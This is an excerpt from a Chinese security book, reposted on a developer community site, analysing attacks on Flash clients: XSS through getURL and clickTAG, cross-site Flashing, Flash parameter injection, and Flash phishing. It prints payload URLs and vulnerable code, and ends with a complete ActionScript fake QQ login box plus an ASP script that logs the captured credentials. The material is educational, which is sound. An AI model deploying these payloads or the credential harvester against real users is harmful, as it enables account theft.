AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

《XSS跨站脚本攻击剖析与防御》—第6章6.3节Flash客户端攻击剖析

2017-05-02 1452
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:

本节书摘来自异步社区《XSS跨站脚本攻击剖析与防御》一书中的第6章6.3节Flash客户端攻击剖析,作者邱永华,更多章节内容可以访问云栖社区“异步社区”公众号查看。

6.3 Flash客户端攻击剖析
XSS跨站脚本攻击剖析与防御
对Flash的基础概念和安全模型进行详细介绍后,现在我们来讨论一些比较实际、也是大家最关心的问题——Flash的安全漏洞。

最早研究Flash漏洞的安全人员要算是Stefano Di-Paola,当时他在OWASP发布了几篇论文,详细介绍了Flash的众多安全漏洞,以及如何利用这些漏洞执行XSS、CSRF之类的攻击,下面让我们一步步进行讨论。

6.3.1 getURL() & XSS
在Flash中被利用最多是 XSS漏洞。第一个Flash XSS漏洞出现在2003年,利用的是clickTAG 变量。

图6-13和图6-14所示为关于Flash XSS的漏洞报告。



clickTAG变量是为基于广告的Flash设计的,其作用是跟踪广告,并帮助提供广告的网络机构跟踪广告的显示位置和广告被单击的时间、次数等。

下面是一个典型的利用标签嵌入横幅广告的示例代码:

embed src="http://www.test.com/banner.swf?clickTAG=http://test.com/track?http://example.com"
或者也可以这样实现:

<object type="application/x-shockwave-flash" data=" http://www.test.com/banner.swf" width="640" height="480" > 
<param name="movie" value="http://www.test.com/banner.swf"> 
 <param name=”flashvars” value=” clickTAG=http://test.com/track?http://example.com”> </object>



如果执行getURL(clickTAG)前没有正确检查clickTAG变量,就有可能被注入恶意脚本执行XSS攻击。

我们演示一下。打开Adobe Flash CS3软件,按下快捷键【F9】打开动作面板,如图6-15所示,输入以下ActionScript代码:

getURL (clickTag, "_top");
编译完成之后,用浏览器进行访问:

http://127.0.0.1/xss.swf?clickTag=javascript:alert(/xss/);
此时成功触发XSS,如图6-16所示。



上述示例中,主要利用ActionScript 2.0中的getURL()函数来执行跨站脚本代码。getURL()函数的作用是将来自特定URL的文档加载到窗口中,或将变量传递到位于所定义的URL的另一个应用程序,语法如下:

getURL(url:String, [window:String, [method:String]]) : Void
参数说明如下:

url:String:从该处获取文档的URL
window:String [可选]:指定应将文档加载到其中的窗口或HTML帧,您可输入特定窗口的名称,或从下面的保留目标名称中选择:
   _self 指定当前窗口中的当前帧
   _blank 指定一个新窗口
   _parent 指定当前帧的父级
   _top指定当前窗口中的顶级帧
method:String [可选]:用于发送变量的GET或POST方法,如果没有变量则省略此参数
使用getURL()可以使页面重定向到函数指定的页面,函数内的参数通常需要设置一个URL,比如http://www.playsec.com,具体脚本如下:

getURL(“http://www.playsec.com”);
假设用“javascript: URL”来替换:

javascript getURL(javascript:code, '_self') getURL("javascript:alert(document.cookie)");
此时,就能得到一个JavaScript alert对话框。这意味着,我们可以利用getURL()函数来执行任意脚本代码。

假设一个含有漏洞的SWF文件有以下ActionScript脚本:

getURL("javascript:void(0)", "_self", "GET");
那么,通过访问以下URL就可以执行代码:

http://127.0.0.1/xss.swf?a=0:0;alert(/XSS/);
XSS的效果如图6-17所示。



我们来看一个更加简单的例子。新建一个Flash应用程序,输入以下ActionScript 2.0代码:

getURL('javascript:alert(123);');
编译好该文件,将文件命名为xss.swf,然后新建一个HTML文件并嵌入该Flash文件:

javascript <object id="test" width="200" height="150">  <param name=movie value="Movie.swf">   <embed AllowScriptAccess="always" name='test' src="xss.swf" type="application/x- shockwave-flash" width="200" height="150">  </embed> </object>
再用浏览器打开新建的HTML文档,此时会弹出对话框,如图6-18所示。



需要注意的是,虽然ActionScript 2支持getURL()函数,但ActionScript 3已经不支持了。和Flash Player的版本无关,代码都是兼容的,所以只要用ActionScript 2.0来编写脚本即可。

总而言之,Flash XSS是利用有漏洞的Flash文件进行攻击,漏洞产生的原因主要来自于未经初始化的变量。

任何未初始化的变量,如_root. 、_global. 、_level0. 都能通过查询关键字为其赋值。

注入点如下。

getURL()函数 (如使用Javascript:alert('XSS'))。
load(URL,..) 函数 (如使用asfunction:getURL,javascript:alert('XSS'))。

loadVariables(url, level )。

LoadMovie ( url, target )。

LoadMovieNum( url, level )。

XML.load ( url )。

LoadVars.load ( url )。

Sound.loadSound( url , isStreaming )。

NetStream.play( url )。

TextField.html属性 (如)。

漏洞示例代码如下:

javascript if (_root.url == undefined) {   _root.url = "http://host/"; } gerURL(_root.url);
访问以下URL就能触发XSS:

http://host/movie.swf?url=javascript:alert('XSS')
6.3.2 Cross Site Flashing
跨站Flashing(Cross Site Flashing,XSF)不是一种新型的攻击,但是非常常见。XSF和XSS原理很相似,但XSF利用编写不规范的Flash对象,并从URL参数中获取输入,从而导致恶意攻击,示例如下:

http://foo.com/file.swf?url=javascript:alert(document.cookie);
跨站 Flash 攻击发生时,通常来自两个不同的域,情况如下。

当一个Flash影片用loadMovie函数(或者利用其他方法)载入另一个Flash影片时,便能获取相同的安全沙箱。

② 当HTML网页使用Script去解析一个Flash影片的时候,也会产生XSF。

由此可见,XSF可以通过向网站注入恶意的Flash程序来实施攻击,示例如下:

javascript if(_root.movieURI == undefined){   _root.movieURI = "http://host/movie.swf"; } loadMovieNum(_root.movieURI,1);
触发漏洞的URL:

http://host/movie.swf?movieURI=maliciousFile.swf
在这个示例中,Flash可能包含事先定义的全局变量 _root.movieURI,并且给该变量赋予正常Flash文件进行调用,然后通过 loadMovieNum()方法加载Flash文件movie.swf。但是,当攻击者了解到此全局变量后,可以将恶意Flash文件 maliciousFile.swf 赋给该变量,浏览器就会通过loadMovieNum ()方法装载恶意文件。

下面再来看另外一个示例。

漏洞代码:

loadMovie(_root.mURL + '/movie2.swf');
访问地址:

http://host/foo.swf?mURL=asfunction:getURL,javascript:alert(123)//
结果变成:

loadMovie('asfunction:getURL,javascript:alert(123)///movie2.swf')
进而脚本代码被顺理成章地执行。

除了上述例子中的loadMovieNum()和loadMovie()函数,如果用户能控制的某些数据没有被严格处理,在下面的函数或变量中使用也可能触发XSF攻击。

javascript loadVariables。 loadMovie。 getURL。 loadMovie。 loadMovieNum。 FScrollPane.loadScrollContent。 Sound.loadSound。 NetStream.play。 flash.external.ExternalInterface.call。 htmlText。
这种含有潜在危险的函数简称为PDNF(Potentially Dangerous Native Function),它们通常允许使用asfunction伪协议,前面的例子即使用了asfunction来执行代码。

asfunction是一个专用于Flash的HTML附加协议,在Flash里,标签的href属性有3个不同的协议:HTTP、HTTPS和FTP,关键字asfunction是第四个有效的协议,允许用户通过超级链接调用函数或带一个参数的函数,例如:

click here
在此示例中,当【click here】按钮被按下后,将调用myFunc()函数,而myParameter是myFunc()函数的一个参数。

6.3.3 Flash参数型注入
FPI(Flash Parameter Injection)指Flash参数型注入攻击,是一种动态注入Flash的全局参数的攻击手段。

众所周知,网页中的Flash是直接嵌入到HTML文档中的,因此不能被URI加载,但是由于Flash的一些全局参数是可以通过URI来设置的。这样一来,如果攻击者能访问和控制Flash的全局参数,就能够进行Flash XSS、跨站Flash等攻击。

IBM Rational的安全团体曾经发布一本白皮书专门介绍FPI攻击,该白皮书的名字为Flash Parameter Injection,书中介绍了几种可以在Flash嵌入HTML页面时覆盖全局参数执行攻击的方法,有如下几种类型:

反射型Flash参数注入(Reflected Flash Parameter Injection);
附带FlashVars的反射型Flash参数注入(Reflected Flash Parameter Injection with FlashVars);
FlashVars注入(FlashVars Injection);
基于DOM的Flash参数注入(DOM-based Flash Parameter Injection);
持久型Flash参数注入(Persistent Flash Parameter Injection)。
(1)反射型Flash参数注入。

当Flash视频的名称作为URL参数暴露在外的时候,攻击者可以控制装入的Flash变量,以加载一个恶意的Flash视频。

漏洞代码:

javascript print '<object type="application/x-shockwave-flash" data="' . $params{movie} . '"></object>';
在上面的代码中,Flash视频的名称取自请求中的表单或URL参数,并且被放在生成的HTML页面中,攻击者可能通过下面的URL覆盖一些Flash全局参数
受害者单击该链接时,即生成下面的HTML代码:

javascript <object type="application/x-shockwave-flash" data="myMovie.swf?globalVar=e-v-i-l" > </object>
(2)附带FlashVars的反射型Flash参数注入。

这种方法使用FlashVars属性。该属性可以在标签中指定,用来传递全局Flash参数。在ActionScript 2.0中,FlashVars会被自动导入到Flash应用程序的变量空间。

漏洞代码如下:

javascript my $language; if (exists($params{language})) { $language = $params{language}; } else { $langauge = "English"; # 默认值 } print '<object type="application/x-shockwave-flash" data="myMovie.swf" flashvars= "language=' . $language . '"></object>';
攻击的方式如下:

http://www.test.com/index.cgi?language=English%26globalVar=e-v-i-l
其中,26%被编码成&,并产生以下的HTML代码:

javascript <object type="application/x-shockwaMovie.swf" ve-flash" data="my flashvars="language=English&globalVar=e-v-i-l"> </object>
(3)FlashVars注入。

当任意的标签的属性作为参数接收时,都可能导致这种攻击,漏洞代码如下:

javascript print '<object type="application/x-shockwave-flash" ' . 'data="myMoive.swf" ' . 'width="' . $params{width} . '" height="' . $params{height} . '"></object>';
width和height参数没有被过滤和消毒,直接传递到输出的HTML文档,攻击示例如下:

http://URL/myMovie.cgi? width=600&height=600" flashvars="globalVar=e-v-i-l
单击以上链接生成下面的HTML代码:

javascript <object type="application/x-shockwave-flash" data="myMovie.swf" width=" 600" height="600" flashvars="globalVar=e-v-i-l"> </object>
(4)基于DOM的Flash参数注入。

当document.location变量被用作Flash参数的时候,会导致此类攻击,其漏洞代码如下:

javascript <script type="text/javascript" language="JavaScript"> var s = ''; var loc = encodeURI(document.location); s += '<object>'; s += ' <embed src="myFlash.swf" flashvars="location='+ loc +'">'; s += ' </embed>'; s += '</object>'; document.write(s); </script>
攻击示例:

http://URL/index.htm#&globalVar=e-v-i-l
生成的代码则是:

javascript <object> <embed src="myFlash.swf" flashvars="location=http://URL/index.htm#&globalVar=e-v-i-l"> </embed> </object>
这里有两个变量传递给Flash文件,分别是location和glbalVar。location的值为http://URL/index.htm#,glbalVar的值为e-v-i-l。另外,#后的数据不会发送给服务器,这和前面讲过的DOM-Based XSS的原理一样。

(5)持久型Flash参数注入。

该攻击发生在Flash Cookie被保存下来并且被加载到Flash视频中的情况下。

6.3.4 Flash钓鱼剖析
除了利用Flash本身存在的漏洞执行攻击,还可以把Flash当做一个载体加以利用,如网络钓鱼攻击。此类攻击不要求Flash或网站本身存在漏洞,而是结合社会工程学进行攻击。

近年来,基于Flash的钓鱼攻击日益增多,例如,前段时间就有利用QQ空间伪装QQ安全中心进行钓鱼的案例。攻击者通过QQ空间的装扮功能,利用Flash播放器播放了一个精心构造的Flash文件来仿造QQ登录框,并诱使用户输入账号及密码信息。当受害者输入自己的QQ账号和密码后,该信息被发送到指定的空间,并生成一个文本文件记录下来。

该Flash文件的ActionScript代码如下:

javascript var str = "http://localhost/mail.asp"; ntxt.restrict = "0-9"; var scData = new LoadVars(); scData.onLoad = function (success) {   if (!success) {     msg.text = "错误:用户密码错误!";   }else   {     msg.text = "错误:用户密码错误!";   }   gotoAndStop(4); }; sub_btn.onRelease = function () {   var _loc1 = ntxt.text;   var _loc2 = ptxt.text;   if (_loc2.length > 5 && _loc1.length > 4)   {     scData.QQNumber = _loc1;     scData.QQPassWord = _loc2;     scData.sendAndLoad(str, scData, "get");   }   if (_loc2.length < 6 || _loc1.length < 5)   {     ntxt.text = "";     ptxt.text = "";   } }; stop ();
服务端的处理程序如下:

javascript <% strLogFile="testqqhahaha.txt" QQNumber=request("QQNumber") QQPassWord=request("QQPassWord") if QQNumber="" or QQPassWord="" then   response.write "哈哈哈哈"   response.end End If StrLogText=StrLogText&QQNumber&"----"&QQPassWord StrLogText=StrLogText&"----"&date&" "&time set f=Server.CreateObject("scripting.filesystemobject") set ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,8,true,0) ff.writeline(StrLogText) ff.close set ff=nothing set f=nothing response.write "嘿嘿嘿嘿!" %>
虚假的Flash QQ登录框如图6-19所示。


用Flash打造的登录框和真实的QQ 登录框几乎一样,即使是颇具经验的用户和早期的安全解决方案都无法识别,Flash钓鱼攻击的危害可见一斑。

本文仅用于学习和交流目的,不代表异步社区观点。非商业转载请注明作译者、出处,并保留本文的原始链接。

文章标签:
内存技术
JavaScript
前端开发
安全
Web App开发
异步社区
目录
相关文章
黑客网络安全
|
存储 安全 JavaScript
渗透攻击实例-xss跨站脚本攻击
渗透攻击实例-xss跨站脚本攻击
黑客网络安全
133 0
数据知道
|
3月前
|
存储 安全 JavaScript
XSS跨站脚本攻击详解(包括攻击方式和防御方式)
这篇文章详细解释了XSS跨站脚本攻击的概念、原理、特点、类型,并提供了攻击方式和防御方法。
数据知道
601 1
Shadow_143
|
4月前
|
存储 JavaScript 安全
Web安全之XSS跨站脚本攻击
XSS(跨站脚本攻击)
Shadow_143
122 7
sumith
|
7月前
|
存储 安全 JavaScript
HW常见攻击方式 --XSS跨站脚本攻击
HW常见攻击方式 --XSS跨站脚本攻击
sumith
97 0
德迅云安全陈琦琦
|
7月前
|
存储 JavaScript 安全
你知道跨站脚本攻击吗?
你知道跨站脚本攻击吗?
德迅云安全陈琦琦
53 0
阿里云社区
|
存储 SQL 安全
XSS 跨站脚本攻击_2 | 学习笔记
快速学习 XSS 跨站脚本攻击_2
阿里云社区
201 0
XSS 跨站脚本攻击_2 | 学习笔记
阿里云社区
|
存储 安全 网络安全
XSS 跨站脚本攻击_4 | 学习笔记
快速学习 XSS 跨站脚本攻击_4
阿里云社区
243 0
XSS 跨站脚本攻击_4 | 学习笔记
阿里云社区
|
Web App开发 网络协议 安全
XSS 跨站脚本攻击_5 | 学习笔记
快速学习 XSS 跨站脚本攻击_5
阿里云社区
127 0
XSS 跨站脚本攻击_5 | 学习笔记
阿里云社区
|
SQL 存储 安全
XSS 跨站脚本攻击_1 学习笔记
快速学习 XSS 跨站脚本攻击_1
阿里云社区
162 0
XSS 跨站脚本攻击_1 学习笔记
技术小美
|
前端开发 JavaScript
xss跨站脚本攻击汇总
技术小美
1364 0

热门文章

最新文章

  • 1
    基于区块链的机器学习模型创建方案
  • 2
    性能的极致,Rust的加持,Zed-Dev编辑器快速搭建Python3.10开发环境
  • 3
    首届Global VR Hackathon完结 全球前三甲诞生
  • 4
    我的博客即将入驻“云栖社区”,诚邀技术同仁一同入驻。
  • 5
    iptables
  • 6
    DevExpress 10.2.4系列-ASPxListBox根据列值不同设置不同图标
  • 7
    jquery的load加载js页面到指定div中
  • 8
    分享平时工作中那些给力的shell命令(更新版)
  • 9
    如何在ubuntu下用SVN commit
  • 10
    hdu 1800 Flying to the Mars
  • 1
    HelloMeme:开源的面部表情与姿态迁移框架,将视频中的人物表情迁移到静态图像中生成动态视频
    102
  • 2
    VSI-Bench:李飞飞谢赛宁团队推出视觉空间智能基准测试集,旨在评估多模态大语言模型在空间认知和理解方面的能力
    32
  • 3
    CLEAR:新加坡国立大学推出线性注意力机制,使8K图像的生成速度提升6.3倍,显著减少了计算量和时间延迟
    35
  • 4
    Kheish:开源的多智能体开发框架,通过 YAML 配置工作流和多个 Agent 共同协作解决复杂任务
    41
  • 5
    Bamba-9B:基于 Mamba2 架构的仅解码语言模型,旨在提高大型语言模型在推理时的效率
    37
  • 6
    DisPose:清华北大等多所高校联合推出基于人物图像增强视频生成技术,实现对人物动画的准确控制和一致性
    42
  • 7
    InvSR:开源图像超分辨率生成模型,提升分辨率,修复老旧照片为超清图像
    41
  • 8
    Univer:开源全栈 AI 办公工具,支持 Word、Excel、PPT 等文档处理和多人实时协作
    29
  • 9
    《人工智能:驱散新材料数据噪声与填补缺失值的曙光》
    28
  • 10
    《人工智能:解锁新材料最佳掺杂元素及比例的密码》
    21

    • 相关课程

    更多
  • 劫持发现、定位以及解决的最佳实践

    • 相关电子书

    更多
  • 如何产生威胁情报-高级恶意攻击案例分析
  • 低代码开发师(初级)实战教程
  • 阿里巴巴DevOps 最佳实践手册
    • 下一篇
    DataWorks售前咨询